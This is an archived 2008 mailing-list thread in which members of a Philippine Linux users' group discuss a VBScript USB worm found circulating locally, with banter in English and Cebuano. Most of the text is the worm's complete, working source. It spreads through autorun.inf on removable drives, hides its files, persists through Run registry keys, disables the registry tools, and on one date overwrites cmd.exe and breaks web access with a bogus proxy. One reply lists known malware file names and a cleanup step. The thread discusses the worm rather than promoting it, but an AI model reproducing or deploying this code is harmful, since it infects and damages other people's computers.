Re: [klug] [OT] Malicious code from CDOC guy

Tue, 12 Feb 2008 09:04:24 -0800 

The "scandal variant" of this script also generates [PEGASUS].TXT on some
systems which contains "BLACK PEGASUS" Hacking Team from Agusan del Sur. And
also mentions that he/she/they come from STI in Agusan.

That just confirms how prevalent this script is and is being exchanged in
the underground too frequently.

On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]> wrote:

> sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS...
>
> which is arch is right.. ang original kay...
>
>  rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU"
>
> hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao mani uso
> karon... scripts na pangsinamok lang sa computer, pakamang sa computer na di
> ma detect sa anti-virus... mostly kay VB....
>
> list ani nila sa akong na encounter sa XU internet lab kay...
>
> autorun.*
> TTM*.*
> Desktop.*
> imgkulot*.*
> RECYCLER\INFO.exe
> RECYCLER\RECYCLER.exe
> RECYCLER\Desktop.ini
> sysdll.exe
> krag.exe
>
> RavMon*.*
> msv*.dll
> scvhosts.exe
> scvhost.exe
> svhost.exe
> C:\Windows\svhost.exe
> C:\Windows\svhost32.exe
> "New Folder".exe
> "Funny UST Scandal.avi.exe"
> smss.exe
> jay.exe
> transmit.exe
> isetup.exe
>
>
> most sila ga kalat kay sa flashdisk... naka hidden files, system files and
> read-only files....
>
> then time to time.. ga usab ila name.. then ga improve ila pag kamang...
> last worst encounter nako kay even imo na gi safe mode, nag dagan gihapon
> sya... balig naka system na sya... even imo na gi delete sa regedit kay naa
> gihapon sya... msconfig, naa gihapon. ang last nako gibuhat kay gi delete
> nako ang mga RECYCLER sa tanan drive nako.. kay didto man sila diay gatago..
> hehehehehe... so solve na dayun.. :)
>
> amen...
>
> ===================================
>
> On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote:
>
> > Obviously this is offtopic, since the guy's script can only
> > run in an OS which supports regedit.exe, wscript.exe and the
> > other MS-apps.
> >
> > Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives
> > and then copy itself to them :D
> >
> > pretty harmless compared to the other naught scripts but nonetheless
> > still annoying :D
> >
> >
> > "DOHHGS Ni TAGA CDOC"
> >
> > Who wants to claim ownership for this script?
> > :D
> >
> > any takers?
> >
> >
> > ---------------------------------------------------------------------------------------
> > 'THIS IS A MODIFIED VERSION BY: TTMS
> > 'PROUD TO BE FILIPINO, NOT TO CORRUPTION!
> >
> > On Error Resume Next
> >
> > Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath,
> > flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
> >
> > mycmdfile = "cmd.exe"
> >
> > mydate = month(now()) & day(now())
> > myvbsalias = "TTMS" & mydate
> > myvbsfile = myvbsalias & ".dll.vbs"
> >
> > atr = "[autorun]" & vbCrLf & _
> >       "shellexecute=wscript.exe " & myvbsfile
> >
> > Set fs = CreateObject("Scripting.FileSystemObject")
> >
> > Dim mf, text, size
> >
> > Set mf = fs.GetFile(WScript.ScriptFullname)
> >
> > size = mf.size
> > check = mf.Drive.drivetype
> >
> > Set text = mf.openastextstream(1, -2)
> >
> > Do While Not text.atendofstream
> >    mysource = mysource & text.readline
> >    mysource = mysource & vbCrLf
> > Loop
> >
> > Do
> >    Set winpath = fs.GetSpecialFolder(0)
> >
> >    Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> >    tf.Attributes = 32
> >
> >    Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
> >
> >    tf.Write mysource
> >    tf.Close
> >
> >    Set tf = fs.GetFile(winpath & "\" & myvbsfile)
> >
> >    tf.Attributes = 39
> >
> >    If (mydate = "318") Then
> >       Set winsyspath = fs.GetSpecialFolder(1)
> >
> >       cmd = "@echo off" & vbCrLf & _
> >             "wscript " & winpath & "\" & myvbsfile
> >
> >       Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
> >
> >       tf.Attributes = 32
> >
> >       Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
> >
> >       tf.Write cmd
> >       tf.Close
> >
> >       rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyEnable", 1, "REG_DWORD"
> >       rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
> > Settings\ProxyServer", "0.0.0.0:80"
> >
> >       rg.RegWrite
> > "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control
> > Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD"
> >   End If
> >
> >   For Each flashdrive In fs.drives
> >       If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
> > flashdrive.Path <> "A:" Then
> >          Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> >          tf.Attributes = 32
> >
> >          Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile,
> > 2, True)
> >
> >          tf.Write mysource
> >          tf.Close
> >
> >          Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
> >
> >          tf.Attributes = 39
> >
> >          Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> >          tf.Attributes = 32
> >
> >          Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2,
> > True)
> >
> >          tf.Write atr
> >          tf.Close
> >
> >          Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
> >
> >          tf.Attributes = 39
> >       End If
> >    Next
> >
> >    Set rg = CreateObject("WScript.Shell")
> >
> >    rg.RegWrite
> >
> > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> > 1, "REG_DWORD"
> >
> >    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> > Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO
> > PC"
> >
> >    rg.RegWrite
> >
> > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig",
> > winpath & "\" & myvbsfile
> >    rg.RegWrite
> >
> > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
> > winpath & "\" & myvbsfile
> >
> >
> >    If check <> 1 Then
> >       WScript.sleep 200000
> >    End If
> >
> > Loop While (check <> 1)
> >
> > Set sd = CreateObject("WScript.Shell")
> >
> > sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
> >
> > _________________________________________________
> > Kagay-Anon Linux Users' Group (KLUG) Mailing List
> > [email protected] (http://cdo.linux.org.ph)
> > Searchable Archives: http://archives.free.net.ph
> >
>
>
>
> --
> --------------------
> http://www.metacatalyst.com
> http://www.metacatalyst.org
> http://www.zabyer.org
>
> Got my Own Hacker Key:
> v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2
> http://www.hackerkey.com
>
> Registered Linux User: #439468
> _________________________________________________
> Kagay-Anon Linux Users' Group (KLUG) Mailing List
> [email protected] (http://cdo.linux.org.ph)
> Searchable Archives: http://archives.free.net.ph
>



-- 
"A dog that has no bite, barks loudest."
Registered Linux User #400165
http://baudizm.blogsome.com
http://www.bayanihanbooks.com
Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup,
sybase.public.ase.linux

_________________________________________________
Kagay-Anon Linux Users' Group (KLUG) Mailing List
[email protected] (http://cdo.linux.org.ph)
Searchable Archives: http://archives.free.net.ph

Reply via email to